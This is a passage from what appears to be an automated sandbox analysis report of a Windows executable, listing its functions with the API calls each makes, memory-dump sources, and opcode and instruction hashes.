                                                            • Opcode Fuzzy Hash: a2e70b326db007a1ca2b8ef3eb2f5cfdaa092064a5ae87c989d716617ae5c6dc
                                                            • Instruction Fuzzy Hash: 8832F4715102859BDB14DF74C895AE97BE5EF15700F0804BBFD8A8B383EB749A48CB61
                                                            Function 00BD286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD2874
                                                            • _strlen.LIBCMT ref: 00BD2E3F
                                                              • Part of subcall function 00BE02BA: __EH_prolog.LIBCMT ref: 00BE02BF
                                                              • Part of subcall function 00BE1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BDBAE9,00000000,?,?,?,0001043E), ref: 00BE1BA0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD2F91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                            • String ID: CMT
                                                            • API String ID: 1206968400-2756464174
                                                            • Opcode ID: fd9b7f9923502e6bd0737caba02fd2abb06ea58242778dbcc5e40ff1194b5dbd
                                                            • Instruction ID: a228b58b1c35690b4c85eeb5ce16bcae981b69906660420840be663d9ba0c70c
                                                            • Opcode Fuzzy Hash: fd9b7f9923502e6bd0737caba02fd2abb06ea58242778dbcc5e40ff1194b5dbd
                                                            • Instruction Fuzzy Hash: 2062D5715002858FDB19DF38C8956EABBE1EF64300F0845BFED9A8B382E7759945CB60
                                                            Function 00BEF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BEF844
                                                            • IsDebuggerPresent.KERNEL32 ref: 00BEF910
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BEF930
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00BEF93A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: 3edb9019c029b35ece3265901d8fc77fa2ca635bde9a7984e09e578a355d2846
                                                            • Instruction ID: 0fd50c22a908f57abbffbc5f64f116dd7826364a8b01eb7b851bc1d62e922df1
                                                            • Opcode Fuzzy Hash: 3edb9019c029b35ece3265901d8fc77fa2ca635bde9a7984e09e578a355d2846
                                                            • Instruction Fuzzy Hash: 0A311475D052599BDB20DFA5D989BCCBBF8AF08304F1040EAE40CAB250EB719B84CF44
                                                            Function 00BEE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,00BEE5E8,0000001C,00BEE7DD,00000000,?,?,?,?,?,?,?,00BEE5E8,00000004,00C31CEC,00BEE86D), ref: 00BEE6B4
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00BEE5E8,00000004,00C31CEC,00BEE86D), ref: 00BEE6CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: InfoQuerySystemVirtual
                                                            • String ID: D
                                                            • API String ID: 401686933-2746444292
                                                            • Opcode ID: 3f71cc7cca01fa3b938047b4123d181e23987e61557db1ef82a312c03c54cb1a
                                                            • Instruction ID: 1e30af5c95656ef0d20064a64f30628a9c87648b1ca84d37b1d95d26638cee9b
                                                            • Opcode Fuzzy Hash: 3f71cc7cca01fa3b938047b4123d181e23987e61557db1ef82a312c03c54cb1a
                                                            • Instruction Fuzzy Hash: 0801D4326001496BDB14DE29DC09BDE7BEAEFC4324F0CC160ED29D6154D738ED058680
                                                            Function 00BF8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00BF8FB5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00BF8FBF
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00BF8FCC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: a63be46202414e67bc7353150f1972b9633586aca522b8859157c3cfec2e649b
                                                            • Instruction ID: 77119dc243f90aa117cb5002f2d0e96ca3f6198ed89a1d353eea15ef1f555a8e
                                                            • Opcode Fuzzy Hash: a63be46202414e67bc7353150f1972b9633586aca522b8859157c3cfec2e649b
                                                            • Instruction Fuzzy Hash: AE31B27590122DABCB21DF69D889B9DBBF8EF48310F5045EAE41CA7250EB709F858F44
                                                            Function 00BFD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction ID: 09399a3e2ae3aed1b9f0ee280d7840c7ee8ff495b7cf931a68e044632cb86169
                                                            • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction Fuzzy Hash: 33020D71E002199BDF14DFA9C9806ADF7F2EF48314F2582A9D919EB384D731AD45CB90
                                                            Function 00BEAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BEAF35
                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,00C0E72C,?,?), ref: 00BEAF84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: FormatInfoLocaleNumber
                                                            • String ID:
                                                            • API String ID: 2169056816-0
                                                            • Opcode ID: e47d13541fea4c3575dbe6a632de963f0e98ffea9b7dcf06a4a4d867bc6a4f28
                                                            • Instruction ID: c3e964849617d2881dfdaeec15bc81e41cacd90fd32b619bca9c809d3baceb9c
                                                            • Opcode Fuzzy Hash: e47d13541fea4c3575dbe6a632de963f0e98ffea9b7dcf06a4a4d867bc6a4f28
                                                            • Instruction Fuzzy Hash: 0A017C7A250348AAD7219F75EC45F9EB7BCEF08710F004426FA05E7190E370AA55CBA5
                                                            Function 00BD6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00BD6DDF,00000000,00000400), ref: 00BD6C74
                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00BD6C95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 559ffb0775ce4ff25f5d8898716509be40b9b54a7f13f666c251a899f9e9dad3
                                                            • Instruction ID: 53549e14a34b1672279672e63d7fc57a0e1b9bab8c23645a28b0901665de8913
                                                            • Opcode Fuzzy Hash: 559ffb0775ce4ff25f5d8898716509be40b9b54a7f13f666c251a899f9e9dad3
                                                            • Instruction Fuzzy Hash: A8D0C931385300BFFA110B618D46F2EBB9DFF45B55F19C445B795E80E0DA789424E629
                                                            Function 00C019F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C019EF,?,?,00000008,?,?,00C0168F,00000000), ref: 00C01C21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: cff255d3c208b05844df053e4e3f8bff879aeb468e42bee7619ac5d9dc8394e4
                                                            • Instruction ID: 755208492d5ce68a01e51026853205b5e594df6246979a23d32538ad174046ea
                                                            • Opcode Fuzzy Hash: cff255d3c208b05844df053e4e3f8bff879aeb468e42bee7619ac5d9dc8394e4
                                                            • Instruction Fuzzy Hash: 6BB12C756106099FE715CF28C48AB65BBE0FF45364F298658E8AACF2E1C335DA91CB40
                                                            Function 00BEF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00BEF66A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            • Opcode ID: 7199902f159a2cc94d0a9f916b09383cb7621aa554b15ecee15e178d4bc44901
                                                            • Instruction ID: 8c073703e88777c72e2f7fe19ac61a8969f546eb6b3577e79bf68aa3c99b1e0e
                                                            • Opcode Fuzzy Hash: 7199902f159a2cc94d0a9f916b09383cb7621aa554b15ecee15e178d4bc44901
                                                            • Instruction Fuzzy Hash: B65181B1A10656CFEB15CF59E8817AEBBF4FB88314F298979D801EB250D3749D01CB50
                                                            Function 00BDB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 00BDB16B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Version
                                                            • String ID:
                                                            • API String ID: 1889659487-0
                                                            • Opcode ID: 1b6f291a5ba9d612a7a3582495dcf8b0e9e04f65948e28f1511070395c258878
                                                            • Instruction ID: 011d02e0bb6cf1d795f1977fb93dc5b1d9ee8039966d3799f9fed2f0d3b71414
                                                            • Opcode Fuzzy Hash: 1b6f291a5ba9d612a7a3582495dcf8b0e9e04f65948e28f1511070395c258878
                                                            • Instruction Fuzzy Hash: 8CF030B4D00208CFDB18CB18EC91BDD77F5FB49319F15469ADA1593390D374AA81CE60
                                                            Function 00BD40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gj
                                                            • API String ID: 0-4203073231
                                                            • Opcode ID: 1391e18ffd7bd9e876231ffcb72c43c8696275935ffdbfd6ae1ebd7970ada0cd
                                                            • Instruction ID: cd2adecd045b06b550ba61e97100126b752bb41e2aa8d0f5e19312d8df407015
                                                            • Opcode Fuzzy Hash: 1391e18ffd7bd9e876231ffcb72c43c8696275935ffdbfd6ae1ebd7970ada0cd
                                                            • Instruction Fuzzy Hash: BBC12776A183818FC354CF29D88065AFBE1BFC8308F19892EE998D7311D734E955CB96
                                                            Function 00BEF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00BEF3A5), ref: 00BEF9DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 4b30360f282df40fb2e75f4c3a732f226f6771709796b2c668f1ee446ddf6e10
                                                            • Instruction ID: 8a9a3cce2907325ad2308ec950e695bd245de7d1594f173ccf9354078b439072
                                                            • Opcode Fuzzy Hash: 4b30360f282df40fb2e75f4c3a732f226f6771709796b2c668f1ee446ddf6e10
                                                            • Instruction Fuzzy Hash:
                                                            Function 00BFC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: cacd782e735f307ca7e881de80563c451c85cd418a29fe2699451e17004be8ab
                                                            • Instruction ID: dd98067d03e81c6fb8b5bb7717cabd24b3f4fb53ab24bfbc4fb6437bbf766b93
                                                            • Opcode Fuzzy Hash: cacd782e735f307ca7e881de80563c451c85cd418a29fe2699451e17004be8ab
                                                            • Instruction Fuzzy Hash: C3A001706122419BDB448F35AF4A74D3AA9AA5A69170A406AA509C5160EA2485A0AA01
                                                            Function 00BE62CA Relevance: .8, Instructions: 829COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                            • Instruction ID: 50cade5256b2fb9d1fbe59b0beb6f571e029cad69e2a489337e0ebaa6fc10eee
                                                            • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                            • Instruction Fuzzy Hash: 4D62E7716047C48FCB25CF29C4906B9BBE1EFA5344F1889AED8EA8B346D734E945CB11
                                                            Function 00BE77EF Relevance: .8, Instructions: 817COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                            • Instruction ID: f26c57e272b1098f6bb29eb88f3a6ca4728e50638290685402d4782e413ee471
                                                            • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                            • Instruction Fuzzy Hash: A962F8716487C58FCB15CF29C8805B9BBE1FF99304F1889ADE89A8B346DB30E945CB15
                                                            Function 00BDF461 Relevance: .7, Instructions: 694COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                            • Instruction ID: 61c727e05f45295b6782a627341c3e92d12c0ec8b2207bede7196410e84fae97
                                                            • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                            • Instruction Fuzzy Hash: BE524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                            Function 00BE7153 Relevance: .5, Instructions: 536COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
